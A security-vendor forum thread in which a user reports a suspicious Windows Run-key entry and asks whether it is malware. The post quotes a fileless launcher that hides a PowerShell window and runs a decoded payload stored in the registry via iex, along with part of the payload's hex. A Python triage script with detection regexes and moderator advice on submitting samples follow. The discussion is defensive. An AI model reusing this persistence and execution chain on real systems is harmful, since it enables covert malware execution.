
Strange PowerShell script

tecnicogsn
tecnicogsn Alumni Posts: 1 Security Scout

Dear Support,

Today I discovered a Windows 7 workstation that, during user login, was starting a strange PowerShell script.

Looking in the Run key of the registry I saw this string:

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"cmstsitf"="rundll32 shell32.dll,ShellExec_RunDLL \"cmd\" /c start /min powershell iex([System.Text.Encoding]::ASCII.GetString((Get-ItemProperty 'HKCU:\\Software\\AppDataLow\\Software\\Microsoft\\9D5F3F33-585C-D7B3-4A21-0CFB1EE5005F').chsbWNet))"

 

Looking in the registry key 9D5F3F33-585C-D7B3-4A21-0CFB1EE5005F I see this data.

(The byte data is much longer)

[HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\9D5F3F33-585C-D7B3-4A21-0CFB1EE5005F]
"Client32"=hex:2c,2f,f8,cc,96,b4,20,01,00,2f,f8,cc,46,4b,2f,01,f0,c7,f7,cc,46,\
5c,2f,01,f0,e7,f7,cc,46,7c,2f,01,f0,e7,f7,cc,46,7c,2f,01,f0,e7,f7,cc,46,7c,\
2f,01,f0,e7,f7,cc,46,7c,2f,01,f0,e7,f7,cc,46,7c,d7,01,84,fa,13,f2,14,55,c8,\
ef,af,ae,1a,e3,5b,b0,14,32,e3,2f,e2,92,8e,2d,a6,83,0e,26,cf,fe,d6,d3,78,52,\[...]

Could it be some kind of malware?
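
A way to triage Run-key entries for the pattern tecnicogsn describes (a rundll32/cmd chain launching a minimized PowerShell that reads a value from another registry key, decodes it and evaluates it with iex), as an added Python example that is not from the original thread or from F-Secure. It parses a .reg export rather than the live registry, so it runs anywhere; the export below is constructed from the Run value quoted in the post plus a made-up benign entry as a control. The indicator list and the scoring threshold are this example's own assumptions, not a vendor signature.

```python
import re

# Constructed .reg export fragment: the first value reproduces the Run entry quoted in
# the post; the second is a made-up benign entry used as a control.
REG_EXPORT = r'''
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"cmstsitf"="rundll32 shell32.dll,ShellExec_RunDLL \"cmd\" /c start /min powershell iex([System.Text.Encoding]::ASCII.GetString((Get-ItemProperty 'HKCU:\\Software\\AppDataLow\\Software\\Microsoft\\9D5F3F33-585C-D7B3-4A21-0CFB1EE5005F').chsbWNet))"
"BenignApp"="C:\\Program Files\\BenignApp\\app.exe /background"
'''

# (label, regex) pairs. Several hits on one value is the fileless pattern from the
# post: a LOLBin chain hands a hidden PowerShell a payload read from another
# registry value, decodes it, and evaluates it with iex.
INDICATORS = [
    ("powershell",        re.compile(r"\bpowershell(?:\.exe)?\b", re.I)),
    ("invoke-expression", re.compile(r"\b(?:iex|invoke-expression)\b", re.I)),
    ("registry-payload",  re.compile(r"\bGet-ItemProperty(?:Value)?\b[^)]*\b(?:HKCU|HKLM):", re.I)),
    ("decode-bytes",      re.compile(r"\[System\.Text\.Encoding\]|FromBase64String", re.I)),
    ("hidden-window",     re.compile(r"/min\b|-w(?:indowstyle)?\s+hidden", re.I)),
    ("shellexec-relay",   re.compile(r"\brundll32\b.*ShellExec_RunDLL", re.I)),
]
PAYLOAD_REF = re.compile(r"Get-ItemProperty\s+'([^']+)'\)\.(\w+)")   # key and value holding the payload
RUN_KEY = re.compile(r"^\[(.*\\Run(?:Once)?)\]$")
VALUE_LINE = re.compile(r'^"([^"]+)"="(.*)"$')

def unescape_reg(s):
    # .reg files write a backslash as \\ and a double quote as \"
    return s.replace('\\"', '"').replace("\\\\", "\\")

def scan_run_keys(reg_text):
    """Return one finding per value under a Run/RunOnce key, with matched indicators."""
    findings, key = [], None
    for line in reg_text.splitlines():
        line = line.strip()
        if line.startswith("["):            # new key: only track Run/RunOnce keys
            m = RUN_KEY.match(line)
            key = m.group(1) if m else None
            continue
        v = VALUE_LINE.match(line)
        if key is None or not v:
            continue
        cmd = unescape_reg(v.group(2))
        hits = [label for label, rx in INDICATORS if rx.search(cmd)]
        ref = PAYLOAD_REF.search(cmd)       # tells the analyst which value to export next
        findings.append({"key": key, "name": v.group(1), "command": cmd,
                         "indicators": hits, "suspicious": len(hits) >= 3,
                         "payload_key": ref.group(1) if ref else None,
                         "payload_value": ref.group(2) if ref else None})
    return findings
```

On a live host the same function can be fed the file produced by `reg export HKCU\Software\Microsoft\Windows\CurrentVersion\Run run.reg`; the recovered payload key and value name are what to export and submit alongside the FSDIAG.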

Comments

  • JamesC
    JamesC WSAccount, WSEmployee, Moderator Posts: 474 Moderator

    Hi tecnicogsn,

    If you suspect that:
    • A clean file has been falsely detected as malicious, or;
    • A file that is malicious but has not been detected by our software
    You can submit the file to our labs for further investigation. To submit a sample file, go to Submit a Sample or browse to the following link: https://www.f-secure.com/en/web/labs_global/submit-a-sample#sample-file
    1. Select the File Sample tab.
    2. Click Choose File, and attach your sample file.
      • Tick the box I want to give more details about this sample and to be notified of the analysis results if you want to receive feedback from F-Secure Labs on the submitted file.
      • Note: Subject and description should be written in English.
    3. Verify that you are not a robot with reCAPTCHA.
    4. Click Submit sample file.
    The sample submission is analyzed by our analysts and databases, and is updated if necessary.

    For more information on how you can submit a sample, read our Community article here.
  • etomcat
    etomcat Alumni Posts: 1,172 Firewall Master

    Hello,

    I think you should use the built-in "F-Secure Support Tool" diagnostics on the computer, either through local run or activated remotely via centralized management and submit the resulting FSDIAG compressed file to F-Secure tech support. That often allows them to find out what's going on, even if an outright binary sample of the suspected malware cannot be located.

    Best Regards: Tamas Feher, Hungary.

This discussion has been closed.